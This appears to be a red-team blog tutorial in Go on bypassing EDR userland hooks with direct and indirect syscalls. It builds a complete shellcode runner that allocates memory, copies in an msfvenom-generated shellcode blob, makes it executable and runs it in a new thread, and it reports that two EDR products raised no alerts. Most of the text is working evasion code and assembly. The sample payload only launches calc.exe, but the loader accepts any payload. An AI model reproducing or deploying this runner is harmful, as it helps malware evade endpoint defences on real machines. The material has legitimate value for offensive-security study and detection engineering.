4. Direct and Indirect Syscalls (shellcode runner)

#syscalls #directsyscalls #indirectsyscalls #Golang #EDREvasion

Intro

In the previous section we worked on a piece of code to detect if ntdll.dll was hooked by the EDR installed on the machine.

Once a hook is detected we have a few choices. We could replace the hook bytes with the original bytes by calculating the SSN. This is a similar approach to loading a fresh copy from the disk. The only difference is that we don't remap the whole dll we just unhook the functions of interest. The issue with this approach is that we still have to modify the dll in memory. This includes using the suspicious WinAPIs VirtualProtect(Ex) WriteProcessMemory etc. Another issue with this approach is that theese functions themselves might be hooked.

This is where the Direct and Indirect syscalls come in handy.

What is a syscall ?

Sequence of events when calling windows APIs

Before going into detail on what a syscall is let's analyze the sequence of events that take place when a simple windows API function is called. The following code is used for analysis.

func main() {
	PROCESS_ALL_ACCESS := 0x1F0FFF
	time.Sleep(30 * time.Second)
	println("run")
	pHandle, _ := windows.OpenProcess(uint32(PROCESS_ALL_ACCESS), false, 9340)
	windows.CloseHandle(pHandle)
}

All we do in this code is sleep for 30 seconds , just to have enough time to attach windbg and set our breakpoints get a handle on a process and then close the handle.

When we try to set a breakpoint on kernel32!OpenProcess we get the following error

0:006> bp kernel32!OpenProcess
Couldn't resolve error at 'kernel32!OpenProcess'

To list all functions starting with O in kernel32 we use the following command

0:006> x /D /f KERNEL32!o*
 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

00007ffa`9aa83a32 KERNEL32!OpenFile$fin$0 (void)
00007ffa`9aa36330 KERNEL32!OOBEComplete (void)
00007ffa`9aa2832c KERNEL32!OpenSortIdKey (void)
00007ffa`9aa37e20 KERNEL32!OOBECompleteWnfQueryCallback (void)
00007ffa`9aa896c0 KERNEL32!OOBECompleteWnfWaitCallback (void)
00007ffa`9aa39260 KERNEL32!OpenFileMappingWStub (OpenFileMappingWStub)
00007ffa`9aa40340 KERNEL32!OpenWaitableTimerW (OpenWaitableTimerW)
00007ffa`9aa39640 KERNEL32!OutputDebugStringWStub (OutputDebugStringWStub)
00007ffa`9aa40300 KERNEL32!OpenEventA (OpenEventA)
00007ffa`9aa8b440 KERNEL32!OpenConsoleW (OpenConsoleW)
00007ffa`9aa39720 KERNEL32!OutputDebugStringAStub (OutputDebugStringAStub)
00007ffa`9aa846b0 KERNEL32!OpenWaitableTimerA (OpenWaitableTimerA)
00007ffa`9aa34730 KERNEL32!OpenProcessStub (OpenProcessStub)
00007ffa`9aa40310 KERNEL32!OpenEventW (OpenEventW)
00007ffa`9aa834e0 KERNEL32!OpenFile (OpenFile)
00007ffa`9aa82e70 KERNEL32!OpenPrivateNamespaceA (OpenPrivateNamespaceA)
00007ffa`9aa5be60 KERNEL32!OpenConsoleWStub (OpenConsoleWStub)
00007ffa`9aa39e00 KERNEL32!OpenProfileUserMapping (OpenProfileUserMapping)
00007ffa`9aa845b0 KERNEL32!OpenMutexA (OpenMutexA)
00007ffa`9aa7cc50 KERNEL32!OpenJobObjectA (OpenJobObjectA)
00007ffa`9aa5be70 KERNEL32!OpenPrivateNamespaceWStub (OpenPrivateNamespaceWStub)
00007ffa`9aa40330 KERNEL32!OpenSemaphoreW (OpenSemaphoreW)
00007ffa`9aa470e0 KERNEL32!OpenFileMappingA (OpenFileMappingA)
00007ffa`9aa7ccd0 KERNEL32!OpenJobObjectW (OpenJobObjectW)
00007ffa`9aa84630 KERNEL32!OpenSemaphoreA (OpenSemaphoreA)
00007ffa`9aa369b0 KERNEL32!OpenThreadStub (OpenThreadStub)
00007ffa`9aa40320 KERNEL32!OpenMutexW (OpenMutexW)
00007ffa`9aa46ca0 KERNEL32!OpenFileByIdStub (OpenFileByIdStub)

What we are interested here is to get a break point 00007ffa9aa34730 KERNEL32!OpenProcessStub on line 16. We will then follow execution to understand what happens.

Let's set a breakpoint in windbg using the following command

0:006> bp KERNEL32!OpenProcessStub

Then sending the command g resumes execution until our breakpoint hit.

0:006> g
Breakpoint 0 hit
*** WARNING: Unable to verify timestamp for C:\Users\ALEXAN~1\AppData\Local\Temp\go-build3312435584\b001\exe\OpenProc.exe
KERNEL32!OpenProcessStub:
00007ffa`9aa34730 48ff25490a0700  jmp     qword ptr [KERNEL32!_imp_OpenProcess (00007ffa`9aaa5180)] ds:00007ffa`9aaa5180={KERNELBASE!OpenProcess (00007ffa`998bc580)}

The jmp instruction on line 5 directs execution to the address held at 00007ffa`9aaa5180, which is the address of kernelbase!OpenProcess.

0:000> dq 00007ffa`9aaa5180 L1 
00007ffa`9aaa5180  00007ffa`998bc580
0:000> u 00007ffa`998bc580
KERNELBASE!OpenProcess:
00007ffa`998bc580 4c8bdc          mov     r11,rsp
00007ffa`998bc583 4883ec68        sub     rsp,68h

So far we called the OpenProcess api from kernel32 which forwards our request to kernelbase to execute. So where do syscalls come in?

Let's dig further into the kernelbase where the actual implementation of the OpenProcess function is.

KERNELBASE!OpenProcess:
00007ffa`998bc580 4c8bdc          mov     r11,rsp
00007ffa`998bc583 4883ec68        sub     rsp,68h
00007ffa`998bc587 498363c000      and     qword ptr [r11-40h],0
00007ffa`998bc58c 4d8d4bb8        lea     r9,[r11-48h]
00007ffa`998bc590 4963c0          movsxd  rax,r8d
00007ffa`998bc593 0f57c0          xorps   xmm0,xmm0
00007ffa`998bc596 c744243030000000 mov     dword ptr [rsp+30h],30h
00007ffa`998bc59e 4d8d43c8        lea     r8,[r11-38h]
00007ffa`998bc5a2 498363d000      and     qword ptr [r11-30h],0
00007ffa`998bc5a7 f7da            neg     edx
00007ffa`998bc5a9 498943b8        mov     qword ptr [r11-48h],rax
00007ffa`998bc5ad 8bd1            mov     edx,ecx
00007ffa`998bc5af 498d4b20        lea     rcx,[r11+20h]
00007ffa`998bc5b3 1bc0            sbb     eax,eax
00007ffa`998bc5b5 83e002          and     eax,2
00007ffa`998bc5b8 89442448        mov     dword ptr [rsp+48h],eax
00007ffa`998bc5bc 498363d800      and     qword ptr [r11-28h],0
00007ffa`998bc5c1 f30f7f442450    movdqu  xmmword ptr [rsp+50h],xmm0
00007ffa`998bc5c7 48ff15fa362300  call    qword ptr [KERNELBASE!_imp_NtOpenProcess (00007ffa`99aefcc8)]
00007ffa`998bc5ce 0f1f440000      nop     dword ptr [rax+rax]
00007ffa`998bc5d3 85c0            test    eax,eax
00007ffa`998bc5d5 780e            js      KERNELBASE!OpenProcess+0x65 (00007ffa`998bc5e5)
00007ffa`998bc5d7 488b842488000000 mov     rax,qword ptr [rsp+88h]
00007ffa`998bc5df 4883c468        add     rsp,68h
00007ffa`998bc5e3 c3              ret

Line 20: we can see another call which eventually takes us to ntdll!NtOpenProcess

NtOpenProcess in the ntdll.dll is where the syscall resides.

00007ffa`9c12f203 b826000000      mov     eax,26h
00007ffa`9c12f208 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffa`9c12f210 7503            jne     ntdll!NtOpenProcess+0x15 (00007ffa`9c12f215)
00007ffa`9c12f212 0f05            syscall
00007ffa`9c12f214 c3              ret
00007ffa`9c12f215 cd2e            int     2Eh
00007ffa`9c12f217 c3              ret

So here comes the question again. What is a syscall and what does it actually do ?

Under the hood, when a user-mode application calls one of these API functions, the Windows kernel handles the actual system call invocation. The transition from user mode to kernel mode is typically managed through a mechanism called a software interrupt or a similar mechanism.

So in order to get a handle on a process all we don't really have to call either of the three functions. All we have to do is follow the x64 calling convention to prepare our registers and the stack move 0x26 (for this particular version of windows) to eax and call the syscall instruction.

The benefit of directly (or indirectly) calling the syscall instruction is that any EDR that relies on userland hooks for detection will be bypassed.

Direct or Indirect Syscalls.

Direct Syscalls

What "direct syscalls" means is that an asm function is written within our executable that calls the syscall instruction directly. Since syscalls are only called from ntdll.dll any calls coming from any other module should be malicious or at least flagged as anomalous.

Direct Syscalls have served us well. One of the early articles I remember reading regarding syscalls was this one from outflank written back in 2019. Although direct syscalls are effective to this day EDR vendors started catching up with the technique (elastic detection of Direct Syscall via Assembly Bytes).

The detection essentially checks if the following sequence of instructions is called from any other module other than ntdll. If that's the case it's flagged as malicious.

mov r10,rcx; 
mov eax,ssn;
syscall;

Indirect Syscalls

The easiest way around this detection is to find the location of syscall within ntdll.dll and instead of directly calling syscall in our assembly function we instead use the call instruction to call the address within the ntdll that holds syscall. In our example above the function will look something like this:

mov r10,rcx; 
mov eax,ssn;
call addr;

In the previous blog we stored an address value in a variable called "trampoline". The trampoline variable was the syscall instruction address for each exported function of the ntdll.

With all the knowledge we have now let's write the shellcode runner using both direct and indirect syscalls.

Shellcode Runner using direct and indirect syscalls

Before we start writing our shellcode runner we need to modify our code first to perform the following:

  • Calculate the SSNs of the hooked functions using the adjacent unhooked functions

    • We can do this by sorting all functions by their address

    • The SSNs are sequential for both Zw and Nt functions

    • Find the last unhooked function and extrapolate the values

  • Develop the assembly functions to call the syscalls / indirect syscalls

  • Write wrapper functions to call from our golang main function

Let's continue from where we left off.

Calculate the SSNs of the hooked functions using the adjacent unhooked functions

It is fairly easy to find the unhooked values since we keep our values in a slice. We will loop through the values in the slice and if a function is hooked we will increase the SSN of the previous value by 1.

Here is the unhooking function.

	for i, fun := range dll.exportedNtFunctions {
		if fun.isHooked {
			dll.exportedNtFunctions[i].syscallno = dll.exportedNtFunctions[i-1].syscallno + 1
			dll.exportedNtFunctions[i].isHooked = false
		}
	}

As mentioned earlier we could restore the value in memory but that would require changing memory permissions therefore more opportunities for the defenders to be alerted.

In our main function we run the UnhookFuncs function and print the exports again on the host running OpenEDR.

	dll.PrintExports()
	dll.UnhookFuncs()
	dll.PrintExports()

Let's cross check that the value 0x33 if it's the correct SSN for NtOpenFile from another identical windows host not running an EDR.

We have programmatically managed to get the correct SSN values of the hooked functions. We are now ready to start building the assembly functions that perform direct and indirect syscalls.

Assembly Functions

Since writing assembly is not the aim of this blog post I will not go in too much detail about it. If this is a subject of interest you can review the go documentation and the plan 9 assembler manual. Also keep an eye out for my upcoming goASM blog.

For the sake of simplicity we will take the ASM functions from two existing projects.

  1. Direct Syscall Function from BananaPhone Project is located here

  2. Indirect Syscall Function from acheron project is located here

Both of these functions are essentially modified versions of the Golang function (asmstdcall) used to perform windows API calls.

Let's have a quick look at the direct syscall function

//based on https://golang.org/src/runtime/sys_windows_amd64.s
#define maxargs 16
//func Syscall(callid uint16, argh ...uintptr) (uint32, error)
TEXT ·bpSyscall(SB), $0-56
	XORQ AX,AX
	MOVW callid+0(FP), AX
	PUSHQ CX
	//put variadic size into CX
	MOVQ argh_len+16(FP),CX
	//put variadic pointer into SI
	MOVQ argh_base+8(FP),SI
	// SetLastError(0).
	MOVQ	0x30(GS), DI
	MOVL	$0, 0x68(DI)
	SUBQ	$(maxargs*8), SP	// room for args
	// Fast version, do not store args on the stack.
	CMPL	CX, $4
	JLE	loadregs
	// Check we have enough room for args.
	CMPL	CX, $maxargs
	JLE	2(PC)
	INT	$3			// not enough room -> crash
	// Copy args to the stack.
	MOVQ	SP, DI
	CLD
	REP; MOVSQ
	MOVQ	SP, SI
loadregs:
	//move the stack pointer????? why????
	SUBQ	$8, SP
	// Load first 4 args into correspondent registers.
	MOVQ	0(SI), CX
	MOVQ	8(SI), DX
	MOVQ	16(SI), R8
	MOVQ	24(SI), R9
	// Floating point arguments are passed in the XMM
	// registers. Set them here in case any of the arguments
	// are floating point values. For details see
	//	https://msdn.microsoft.com/en-us/library/zthk2dkh.aspx
	MOVQ	CX, X0
	MOVQ	DX, X1
	MOVQ	R8, X2
	MOVQ	R9, X3
	//MOVW callid+0(FP), AX
	MOVQ CX, R10
	SYSCALL
	ADDQ	$((maxargs+1)*8), SP
	// Return result.
	POPQ	CX
	MOVL	AX, errcode+32(FP)
	RET

Before we dive into the assembly let's not the main differences between Go Asm and what we will see in windbg (intel syntax)

The function receives a uint16 as an argument. That is the SSN of the syscall we want to perform. The rest of the uintptrs are the arguments passed to the function

  • Line 5 sets the RAX register to 0 by performing the xor operation.

  • Line 6 moves the value of the first argument to RAX essentially recreating the mov eax,33 we have seen in the ntdll exported functions.

  • Line 7 takes the number of arguments into RCX.

  • Lines 17-45: It basically checks how many arguments were passed to the function and follows the x64 calling convention. First 4 arguments passed to the registers RCX, RDX,R8,R9 and the rest are stored in the stack.

  • Line 46 is where the syscall instruction is called.

The indirect syscall function is very similar:

// func execIndirectSyscall(ssn uint16, trampoline uintptr, argh ...uintptr) uint32
TEXT ·execIndirectSyscall(SB),NOSPLIT, $0-40
    XORQ    AX, AX
    MOVW    ssn+0(FP), AX
	
    XORQ    R11, R11
    MOVQ    trampoline+8(FP), R11
	
    PUSHQ   CX
	
    //put variadic pointer into SI
    MOVQ    argh_base+16(FP),SI

    //put variadic size into CX
    MOVQ    argh_len+24(FP),CX
	
    // SetLastError(0).
    MOVQ    0x30(GS), DI
    MOVL    $0, 0x68(DI)

    // room for args
    SUBQ    $(maxargs*8), SP	

    //no parameters, special case
    CMPL    CX, $0
    JLE     jumpcall
	
    // Fast version, do not store args on the stack.
    CMPL    CX, $4
    JLE	    loadregs

    // Check we have enough room for args.
    CMPL    CX, $maxargs
    JLE	    2(PC)

    // not enough room -> crash
    INT	    $3			

    // Copy args to the stack.
    MOVQ    SP, DI
    CLD
    REP; MOVSQ
    MOVQ    SP, SI
	
loadregs:

    // Load first 4 args into correspondent registers.
    MOVQ	0(SI), CX
    MOVQ	8(SI), DX
    MOVQ	16(SI), R8
    MOVQ	24(SI), R9
	
    // Floating point arguments are passed in the XMM registers
    // Set them here in case any of the arguments are floating point values. 
    // For details see: https://msdn.microsoft.com/en-us/library/zthk2dkh.aspx
    MOVQ	CX, X0
    MOVQ	DX, X1
    MOVQ	R8, X2
    MOVQ	R9, X3
	
jumpcall:
    MOVQ    CX, R10

    //jump to syscall;ret gadget address instead of direct syscall
    CALL    R11

    ADDQ	$((maxargs)*8), SP

    // Return result
    POPQ	CX
    MOVL	AX, errcode+40(FP)
    RET

The main differences are:

  • In addition to the ssn it receives a trampoline argument which is the address of the syscall;ret; located in ntdll.dll

  • Line 7: The trampoline addess is stored in R11 register

  • Line 65: Instead of syscall of using the syscall instruction we use the CALL R11 instruction that calls the syscall in ntdll.dll

Wrapper Functions for our assembly functions

In order to be able to call the assembly functions in go we need to save them in the same directory as our code. Since our functions will only work on x64 the name should end with amd64.s. If a 32bit implementation of the function was present we would have to create a separate file ending with _i386.s . That's letting the compiler know the architecture of the assembly functions.

In our code we should also define the functions without a body

func execIndirectSyscall(ssn uint16, trampoline uintptr, argh ...uintptr) (errcode uint32)

func bpSyscall(ssn uint16, argh ...uintptr) (errcode uint32)

That's all needed before we can call the functions.

We will then write a wrapper function that receives the ntapi function as a string and the function arguments. It will then resolve the ssn and trampoline as needed before calling our assembly function.

func (dll *dllstruct) IndirectSyscall(ntapi string, argh ...uintptr) (errcode uint32, err error) {
	var ssn uint16 = 0
	var trampoline uintptr = 0

	if strings.HasPrefix(ntapi, "Nt") {
		for _, fun := range dll.exportedNtFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				trampoline = fun.trampoline
				break
			}
		}

	} else if strings.HasPrefix(ntapi, "Zw") {
		for _, fun := range dll.exportedZwFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				trampoline = fun.trampoline
				break
			}
		}

	} else {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	if ssn == 0 && trampoline == 0 {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	fmt.Printf("Calling Indirect syscall: %s SSN: %x Trampoline: %x\n", ntapi, ssn, trampoline)
	errcode = execIndirectSyscall(ssn, trampoline, argh...)
	if errcode != 0 {
		err = fmt.Errorf("non-zero return from syscall")
	}
	return errcode, err
}

Shellcode Runner code

In order to create our shellcode runner the following native APIs should be called:

  1. NtAllocateVirtualMemory (== VirtualAlloc)

  2. rtlMoveMemory

  3. NtProtectVirtualMemory (== VirtualProtect)

  4. NtCreateThreadEx (==CreateThread)

Let's write the functions one by one. At this point using direct or indirect syscalls has no difference at all. We just have to call the respective function(IndirectSyscall or Syscall) and the code will do the work for us. We will run both implementations against openEDR and elasticEDR to see if any alerts are generated.

Let's create a wrapper function for each ntAPI

NtAllocateVirtualMemory

The arguments passed are identical to the VirtualAlloc function (which is not always the case).

func (dll *dllstruct) NtAllocateVirtualMemorySyscall(ntapi string, handle uintptr, length uintptr, alloctype int, protect int) (uintptr, error) {
	/*
			__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory(
		  [in]      HANDLE    ProcessHandle, 1
		  [in, out] PVOID     *BaseAddress,  2
		  [in]      ULONG_PTR ZeroBits,      3
		  [in, out] PSIZE_T   RegionSize,    4
		  [in]      ULONG     AllocationType,5
		  [in]      ULONG     Protect        6
		);*/
	// syscall for NtAllocateVirtualMemory

	var BaseAddress uintptr

	err1, err := dll.IndirectSyscall(
		ntapi,
		uintptr(unsafe.Pointer(handle)),       //1
		uintptr(unsafe.Pointer(&BaseAddress)), //2
		0,                                     //3
		uintptr(unsafe.Pointer(&length)),      //4
		uintptr(alloctype),                    //5
		uintptr(protect),                      //6
	)
	if err != nil {
		return 0, fmt.Errorf("1 %s %x\n", err, err1)
	}

	return BaseAddress, nil
}

The allocated address is stored at the BaseAddress variable defined before the syscall.

The easiest way to debug if our stack / registers are correct before the syscall is to set up a break point just before the syscall. An easy way to find the address of a function in golang is using the following code which prints the address of the IndirectSyscall() in memory. The the sleep function will give us enough time to attach to process and set our breakpoints.

    var ptr uintptr = reflect.ValueOf(IndirectSyscall).Pointer()
    fmt.Printf("0x%x", ptr)
    time.Sleep(30*time.Second)
    
    

In the main function we add the following code to call our wrapper function:

	pHandle := windows.CurrentProcess()
	addr, err := dll.NtAllocateVirtualMemorySyscall("NtAllocateVirtualMemory", 
						uintptr(pHandle), 
						uintptr(len(sc)), 
						windows.MEM_COMMIT|windows.MEM_RESERVE, 
						windows.PAGE_READWRITE)
	if err != nil {
		log.Fatalf("NtAllocateVirtualMemorySyscall: Failed to allocate memory %v\n", err)
	}
	fmt.Printf("	[+] Allocated Memory Address: 0x%x\n", addr)

rtlMoveMemory

We can use the rtlMoveMemory function to copy the bytes stored in the sc slice to the allocated memory.

	sc, _ := hex.DecodeString("fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500")
	modntdll := syscall.NewLazyDLL("Ntdll.dll")
	procrtlMoveMemory := modntdll.NewProc("RtlMoveMemory")
	
	procrtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	fmt.Println("[!] Wrote shellcode bytes to destination address")

NtProtectVirtualMemory

We then use this native api to adjust the memory permissions to RX.

func (dll *dllstruct) NtProtectVirtualMemory(ntapi string, handle, addr uintptr, size uintptr, flNewProtect uintptr, lpflOldProtect uintptr) error {
	err1, err := dll.IndirectSyscall(
		ntapi,
		handle,
		uintptr(unsafe.Pointer(&addr)),
		uintptr(unsafe.Pointer(&size)),
		flNewProtect,
		lpflOldProtect,
	)
	if err != nil {
		return fmt.Errorf("1 %s %x\n", err, err1)
	}
	fmt.Println("	[+] Changed memory permissions to PAGE_EXECUTE_READ")

	return nil
}

In the main function we add this piece of code to

	err = dll.NtProtectVirtualMemory("NtProtectVirtualMemory", uintptr(pHandle), addr, uintptr(len(sc)), uintptr(windows.PAGE_EXECUTE_READ), uintptr(unsafe.Pointer(&oldProtect)))
	if err != nil {
		log.Fatalf("NtProtectVirtualMemory Failed: %v", err)
	}

NtCreateThreadEx

The last and final step before is to create a thread pointing to our shellcode.

func (dll *dllstruct) NtCreateThreadEx(ntapi string, handle, BaseAddress uintptr) (uintptr, error) {

	/*
	   typedef NTSTATUS(NTAPI* pNtCreateThreadEx) (
	     OUT PHANDLE hThread,               	1
	     IN ACCESS_MASK DesiredAccess,	    	2
	     IN PVOID ObjectAttributes,	        	3
	     IN HANDLE ProcessHandle,		    	4
	     IN PVOID lpStartAddress,			5
	     IN PVOID lpParameter,			6
	     IN ULONG Flags,				7
	     IN SIZE_T StackZeroBits,			8
	     IN SIZE_T SizeOfStackCommit,		9
	     IN SIZE_T SizeOfStackReserve,		10
	     OUT PVOID lpBytesBuffer			11
	   );
	*/

	var hThread uintptr
	DesiredAccess := uintptr(0x1FFFFF)
	err1, err := dll.IndirectSyscall(
		ntapi,
		uintptr(unsafe.Pointer(&hThread)),    //1
		DesiredAccess,                        //2
		0,                                    //3
		uintptr(unsafe.Pointer(handle)),      //4
		uintptr(unsafe.Pointer(BaseAddress)), //5
		0,                                    //6
		uintptr(0),                           //7
		0,                                    //8
		0,                                    //9
		0,                                    //10
		0,				      //11
	)
	if err != nil {
		return 0, fmt.Errorf("1 %s %x\n", err, err1)
	}

	fmt.Printf("	[+] Thread Handle: 0x%v\n", hThread)

	syscall.WaitForSingleObject(syscall.Handle(hThread), 0xffffffff)
	return hThread, nil
}

And in the main function:

	_, err = dll.NtCreateThreadEx("NtCreateThreadEx", uintptr(pHandle), addr)
	if err != nil {
		log.Fatalf("NtCreateThreadEx: Failed to create remote thread %v\n", err)
	}

Detections ?

Using the default rules none of the EDRs generated any alerts other than the process creation.

OpenEDR (22-09-2023)

ElasticEDR (22-09-2023)

Complete Code

Ideally the syscall functionality should be turned into a package and then imported wherever needed.

package main

import (
	"encoding/hex"
	"fmt"
	"log"
	"slices"
	"sort"
	"strings"
	"syscall"
	"unsafe"

	"github.com/jedib0t/go-pretty/v6/table"
	"golang.org/x/sys/windows"
)

type IMAGE_EXPORT_DIRECTORY struct { //offsets
	Characteristics       uint32 // 0x0
	TimeDateStamp         uint32 // 0x4
	MajorVersion          uint16 // 0x8
	MinorVersion          uint16 // 0xa
	Name                  uint32 // 0xc
	Base                  uint32 // 0x10
	NumberOfFunctions     uint32 // 0x14
	NumberOfNames         uint32 // 0x18
	AddressOfFunctions    uint32 // 0x1c
	AddressOfNames        uint32 // 0x20
	AddressOfNameOrdinals uint32 // 0x24
}
type Exportfunc struct {
	funcRVA         uint32  // relative address to the base address of the dll
	functionAddress uintptr // absolute address
	name            string  // name of the exported function
	syscallno       uint16  // SSN
	trampoline      uintptr // syscall ;ret; address location
	isHooked        bool    // Is the function hooked?
}

type dllstruct struct {
	name                   string
	address                uintptr
	exportDirectoryAddress uintptr
	exportDirectory        IMAGE_EXPORT_DIRECTORY
	exportedNtFunctions    []Exportfunc
	exportedZwFunctions    []Exportfunc
}

func main() {
	dll, err := GetStructOfLoadedDll("ntdll.dll")
	if err != nil {
		log.Fatalln(err)
	}

	dll.getExportTableAddress()
	dll.GetImageExportDirectory()
	dll.GetModuleExports()
	dll.UnhookFuncs()

	//// Shellcode runner /////
	//msfvenom -p windows/x64/exec CMD=calc.exe -f hex
	sc, _ := hex.DecodeString("fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500")
	modntdll := syscall.NewLazyDLL("Ntdll.dll")
	procrtlMoveMemory := modntdll.NewProc("RtlMoveMemory")

	/*
		1. NtAllocateVirtualMemory == VirtualAlloc
		2. rtlMoveMemory
		3. NtProtectVirtualMemory == VirtualProtect
		4. NtCreateThreadEx == CreateThread
	*/

	pHandle := windows.CurrentProcess()
	addr, err := dll.NtAllocateVirtualMemorySyscall("NtAllocateVirtualMemory", uintptr(pHandle), uintptr(len(sc)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
	if err != nil {
		log.Fatalf("NtAllocateVirtualMemorySyscall: Failed to allocate memory %v\n", err)
	}
	fmt.Printf("	[+] Allocated Memory Address: 0x%x\n", addr)

	procrtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	fmt.Println("[!] Wrote shellcode bytes to destination address")

	var oldProtect uint32

	err = dll.NtProtectVirtualMemory("NtProtectVirtualMemory", uintptr(pHandle), addr, uintptr(len(sc)), uintptr(windows.PAGE_EXECUTE_READ), uintptr(unsafe.Pointer(&oldProtect)))
	if err != nil {
		log.Fatalf("NtProtectVirtualMemory Failed: %v", err)
	}
	_, err = dll.NtCreateThreadEx("NtCreateThreadEx", uintptr(pHandle), addr)
	if err != nil {
		log.Fatalf("NtCreateThreadEx: Failed to create remote thread %v\n", err)
	}

}

func (dll *dllstruct) NtCreateThreadEx(ntapi string, handle, BaseAddress uintptr) (uintptr, error) {

	/*
	   typedef NTSTATUS(NTAPI* pNtCreateThreadEx) (
	     OUT PHANDLE hThread,               1
	     IN ACCESS_MASK DesiredAccess,	    2
	     IN PVOID ObjectAttributes,	        3
	     IN HANDLE ProcessHandle,		    4
	     IN PVOID lpStartAddress,			5
	     IN PVOID lpParameter,				6
	     IN ULONG Flags,					7
	     IN SIZE_T StackZeroBits,			8
	     IN SIZE_T SizeOfStackCommit,		9
	     IN SIZE_T SizeOfStackReserve,		10
	     OUT PVOID lpBytesBuffer			11
	   );
	*/

	var hThread uintptr
	DesiredAccess := uintptr(0x1FFFFF)
	err1, err := dll.Syscall(
		ntapi,
		uintptr(unsafe.Pointer(&hThread)),    //1
		DesiredAccess,                        //2
		0,                                    //3
		uintptr(unsafe.Pointer(handle)),      //4
		uintptr(unsafe.Pointer(BaseAddress)), //5
		0,                                    //6
		uintptr(0),                           //7
		0,                                    //8
		0,                                    //9
		0,                                    //10
		0,
	)
	if err != nil {
		return 0, fmt.Errorf("1 %s %x\n", err, err1)
	}

	fmt.Printf("	[+] Thread Handle: 0x%v\n", hThread)

	syscall.WaitForSingleObject(syscall.Handle(hThread), 0xffffffff)
	return hThread, nil
}

func (dll *dllstruct) NtProtectVirtualMemory(ntapi string, handle, addr uintptr, size uintptr, flNewProtect uintptr, lpflOldProtect uintptr) error {
	err1, err := dll.Syscall(
		ntapi,
		handle,
		uintptr(unsafe.Pointer(&addr)),
		uintptr(unsafe.Pointer(&size)),
		flNewProtect,
		lpflOldProtect,
	)
	if err != nil {
		return fmt.Errorf("1 %s %x\n", err, err1)
	}
	fmt.Println("	[+] Changed memory permissions to PAGE_EXECUTE_READ")

	return nil
}

func (dll *dllstruct) NtAllocateVirtualMemorySyscall(ntapi string, handle uintptr, length uintptr, alloctype int, protect int) (uintptr, error) {
	/*
			__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory(
		  [in]      HANDLE    ProcessHandle, 1
		  [in, out] PVOID     *BaseAddress,  2
		  [in]      ULONG_PTR ZeroBits,      3
		  [in, out] PSIZE_T   RegionSize,    4
		  [in]      ULONG     AllocationType,5
		  [in]      ULONG     Protect        6
		);*/
	// syscall for NtAllocateVirtualMemory

	var BaseAddress uintptr

	err1, err := dll.Syscall(
		ntapi,
		uintptr(unsafe.Pointer(handle)),       //1
		uintptr(unsafe.Pointer(&BaseAddress)), //2
		0,                                     //3
		uintptr(unsafe.Pointer(&length)),      //4
		uintptr(alloctype),                    //5
		uintptr(protect),                      //6
	)
	if err != nil {
		return 0, fmt.Errorf("1 %s %x\n", err, err1)
	}

	return BaseAddress, nil
}

func (dll *dllstruct) Syscall(ntapi string, argh ...uintptr) (errcode uint32, err error) {
	var ssn uint16 = 0

	if strings.HasPrefix(ntapi, "Nt") {
		for _, fun := range dll.exportedNtFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				break
			}
		}

	} else if strings.HasPrefix(ntapi, "Zw") {
		for _, fun := range dll.exportedZwFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				break
			}
		}

	} else {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	if ssn == 0 {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}
	fmt.Printf("[!] Calling direct syscall: %s SSN: 0x%x \n", ntapi, ssn)

	errcode = bpSyscall(ssn, argh...)

	if errcode != 0 {
		err = fmt.Errorf("non-zero return from syscall")
	}
	return errcode, err
}

func (dll *dllstruct) IndirectSyscall(ntapi string, argh ...uintptr) (errcode uint32, err error) {
	var ssn uint16 = 0
	var trampoline uintptr = 0

	if strings.HasPrefix(ntapi, "Nt") {
		for _, fun := range dll.exportedNtFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				trampoline = fun.trampoline
				break
			}
		}

	} else if strings.HasPrefix(ntapi, "Zw") {
		for _, fun := range dll.exportedZwFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				trampoline = fun.trampoline
				break
			}
		}

	} else {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	if ssn == 0 && trampoline == 0 {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	fmt.Printf("[!] Calling Indirect syscall: %s SSN: 0x%x Trampoline: %x\n", ntapi, ssn, trampoline)
	errcode = execIndirectSyscall(ssn, trampoline, argh...)
	if errcode != 0 {
		err = fmt.Errorf("non-zero return from syscall")
	}
	return errcode, err
}

func execIndirectSyscall(ssn uint16, trampoline uintptr, argh ...uintptr) (errcode uint32)

